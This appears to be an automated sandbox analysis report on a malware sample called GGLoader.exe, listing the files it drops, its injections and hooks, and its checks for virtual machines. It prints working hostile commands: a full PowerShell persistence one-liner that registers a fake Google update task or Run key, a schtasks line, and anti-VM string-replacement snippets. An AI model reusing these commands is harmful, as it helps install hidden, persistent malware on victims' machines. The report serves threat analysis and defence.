                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                        Source: updater.exe.7.dr | Static PE information: real checksum: 0x241e4c should be: 0x2471a6
                        Source: LicenseGet.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x36ca3
                        Source: LicCheck.exe.1.dr | Static PE information: real checksum: 0x0 should be: 0x49cdb
                        Source: GGLoader.exe | Static PE information: real checksum: 0x0 should be: 0x13d5e
                        Source: LicSend.exe.1.dr | Static PE information: real checksum: 0x241e4c should be: 0x2471a6
                        Source: poduiwcd.tmp.7.dr | Static PE information: real checksum: 0x0 should be: 0x2ec3f
                        Source: LicSend.exe.1.dr | Static PE information: section name: .xdata
                        Source: updater.exe.7.dr | Static PE information: section name: .xdata
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B78D2A5 pushad ; iretd 1_2_00007FFD9B78D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B8A0942 push E95B44D0h; ret 1_2_00007FFD9B8A09C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B8811C8 push E95B46C7h; ret 3_2_00007FFD9B881209
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Code function: 6_2_007A5798 push ecx; ret 6_2_007A57AB
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD9B76D2A5 pushad ; iretd 17_2_00007FFD9B76D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 17_2_00007FFD9B880E10 push eax; retf 17_2_00007FFD9B880E1D
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00C0D102 push cs; retf 35_2_00C0D103
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe | Code function: 35_2_00BF5798 push ecx; ret 35_2_00BF57AB
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 38_2_02F068E1 push eax; iretd 38_2_02F06949
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 38_2_02F067D9 push eax; retf 38_2_02F06809
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E5722B8 push rdx; retf 39_2_000002505E5722B9
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E5784FD push rcx; retf 003Fh 39_2_000002505E5784FE
                        Source: C:\Windows\System32\conhost.exe | Code function: 39_2_000002505E5A94FD push rcx; retf 003Fh 39_2_000002505E5A94FE
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAA3C0C push ds; retf 40_2_00007FFD9BAA3C3A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAA3BEC push ds; retf 40_2_00007FFD9BAA3C2A
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAA7DDC push ss; iretd 40_2_00007FFD9BAA7DEA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BAA98CC pushad ; iretd 40_2_00007FFD9BAA98DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 40_2_00007FFD9BCC73A2 push E85F7F18h; ret 40_2_00007FFD9BCC73A9
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1922B8 push rdx; retf 41_2_000001C08C1922B9
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1984FD push rcx; retf 003Fh 41_2_000001C08C1984FE
                        Source: C:\Windows\System32\conhost.exe | Code function: 41_2_000001C08C1C94FD push rcx; retf 003Fh 41_2_000001C08C1C94FE
                        Source: C:\Windows\System32\dllhost.exe | Code function: 42_2_00000213111994FD push rcx; retf 003Fh 42_2_00000213111994FE
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC6222B8 push rdx; retf 43_2_00000225DC6222B9
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC6284FD push rcx; retf 003Fh 43_2_00000225DC6284FE
                        Source: C:\Windows\System32\winlogon.exe | Code function: 43_2_00000225DC6594FD push rcx; retf 003Fh 43_2_00000225DC6594FE

                        Persistence and Installation Behavior

                        Source: C:\Windows\System32\cmd.exe | Process created: reg.exe (10 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File created: C:\Program Files\Google\Chrome\updater.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | File created: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicCheck.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | File created: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\LicSend.exe

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc stop UsoSvc

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PODUIWCD.TMP
                        Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                        Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                        Source: explorer.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (12 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (9 occurrences)
                        Source: explorer.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                        Source: C:\Windows\System32\dialer.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node dialerstager
                        Source: C:\Users\user\Desktop\GGLoader.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 42_2_00000001400010C0
                        Source: C:\Windows\System32\dllhost.exe Stalling execution: Execution stalls by calling Sleep
                        Source: GGLoader.exe Binary or memory string: SBIEDLL.DLL
                        Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1810000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\GGLoader.exe Memory allocated: 1B4D0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\GGLoader.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5689
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4077
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3399
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3192
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6279
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3473
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7014
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2652
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Window / User API: threadDelayed 1055
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4348
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 815
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5850
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1481
                        Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 881
                        Source: C:\Windows\System32\dllhost.exe Window / User API: threadDelayed 574
                        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 4509
                        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 5490
                        Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 8996
                        Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 946
                        Source: C:\Windows\System32\svchost.exe Window / User API: threadDelayed 4355
                        Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9875
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\LicenseGet.exe
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\poduiwcd.tmp
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_6-24265
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_35-23675
                        Source: C:\Windows\System32\dllhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\conhost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_39-13982
                        Source: C:\Windows\System32\dialer.exe Evasive API call chain: RegOpenKey,DecisionNodes,ExitProcess graph_37-203
                        Source: C:\Windows\System32\winlogon.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep
                        Source: C:\Windows\System32\dllhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Windows\System32\conhost.exe API coverage: 6.0 %
                        Source: C:\Users\user\Desktop\GGLoader.exe TID: 7484 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676 Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 Thread sleep count: 3399 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760 Thread sleep count: 3192 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804 Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 6279 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8148 Thread sleep count: 3473 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184 Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472 Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep count: 1055 > 30
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe TID: 7912 Thread sleep time: -52750s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6032 Thread sleep count: 4348 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2648 Thread sleep count: 815 > 30
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3736 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6308 Thread sleep count: 5850 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep count: 1481 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172 Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5840 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep count: 881 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 8148 Thread sleep time: -88100s >= -30000s
                        Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep count: 574 > 30
                        Source: C:\Windows\System32\dllhost.exe TID: 8184 Thread sleep time: -57400s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 4509 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -4509000s >= -30000s
                        Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep count: 5490 > 30
                        Source: C:\Windows\System32\winlogon.exe TID: 8 Thread sleep time: -5490000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 8996 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -8996000s >= -30000s
                        Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep count: 946 > 30
                        Source: C:\Windows\System32\lsass.exe TID: 5016 Thread sleep time: -946000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep count: 4355 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 8080 Thread sleep time: -4355000s >= -30000s
                        Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep count: 9875 > 30
                        Source: C:\Windows\System32\dwm.exe TID: 5052 Thread sleep time: -9875000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep count: 146 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7476 Thread sleep time: -146000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep count: 141 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7540 Thread sleep time: -141000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep count: 141 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7512 Thread sleep time: -141000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep count: 135 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7532 Thread sleep time: -135000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep count: 63 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7484 Thread sleep time: -63000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep count: 116 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7496 Thread sleep time: -116000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep count: 90 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7640 Thread sleep time: -90000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep count: 80 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 1216 Thread sleep time: -80000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 2892 Thread sleep time: -84000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep count: 84 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 5080 Thread sleep time: -84000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep count: 81 > 30
                        Source: C:\Windows\System32\svchost.exe TID: 7696 Thread sleep time: -81000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe File opened: PhysicalDrive0
                        Source: C:\Users\user\Desktop\GGLoader.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\powercfg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Last function: Thread delayed
                        Source: C:\Windows\System32\dllhost.exe Last function: Thread delayed
                        Source: C:\Windows\System32\lsass.exe Last function: Thread delayed
                        Source: C:\Windows\System32\svchost.exe Last function: Thread delayed
                        Source: C:\Windows\System32\dwm.exe Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe Code function: 35_2_00C0A1F1 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 35_2_00C0A1F1
                        Source: C:\Windows\System32\conhost.exe Code function: 39_2_000002505E59BE3C FindFirstFileExW, 39_2_000002505E59BE3C
                        Source: C:\Windows\System32\conhost.exe Code function: 41_2_000001C08C1BBE3C FindFirstFileExW, 41_2_000001C08C1BBE3C
                        Source: C:\Windows\System32\dllhost.exe Code function: 42_2_000002131118BE3C FindFirstFileExW, 42_2_000002131118BE3C
                        Source: C:\Windows\System32\winlogon.exe Code function: 43_2_00000225DC64BE3C FindFirstFileExW, 43_2_00000225DC64BE3C
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exe Code function: 6_2_00793B60 GetSystemInfo,GlobalMemoryStatusEx,CreateFileA,DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 6_2_00793B60
                        Source: powershell.exe, 00000001.00000002.1967211454.000001EC48F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAE'
                        Source: svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
                        Source: svchost.exe, 00000033.00000002.2990825628.000001845BC0A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD00
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
                        Source: svcupdater.exe, 00000023.00000002.2994296261.000000000113B000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000003.00000002.1767788945.000002511E4B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;j
                        Source: GGLoader.exe, 00000000.00000002.1714327459.000000000152B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                        Source: powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                        Source: svchost.exe, 00000035.00000003.2350422690.000001D559C7F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
                        Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
                        Source: GGLoader.exe Binary or memory string: CheckForVMwareAndVirtualBox
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
                        Source: svchost.exe, 0000002D.00000002.2957315131.000002A66062A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                        Source: svchost.exe, 00000035.00000002.3000604673.000001D559E88000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMCI: Using capabilities (0x1c).
                        Source: svchost.exe, 00000035.00000000.2301742572.000001D559C12000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
                        Source: GGLoader.exe Binary or memory string: vmware
                        Source: svchost.exe, 00000035.00000003.2354475189.000001D5592A3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: nonicNECVMWarVMware SATA CD00
                        Source: powershell.exe, 00000003.00000002.1767742399.000002511CE80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;W6432=C:\Progr@L]
                        Source: svchost.exe, 00000035.00000002.2964974668.000001D55862B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000000.2294791024.000001D55862B000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor
                        Source: powershell.exe, 00000003.00000002.1767408817.000002511CAF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1767408817.000002511CAE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1790991366.0000025136E12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1789784483.0000025136BB0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAdd-Type-AssemblyNameSystem.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('NoVirtualMachine/Serverisallowed!Tryrunningonadifferentdevice!','','OK','Error')<#wkk#>;
                        Source: svchost.exe, 00000035.00000003.2355871811.000001D559386000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
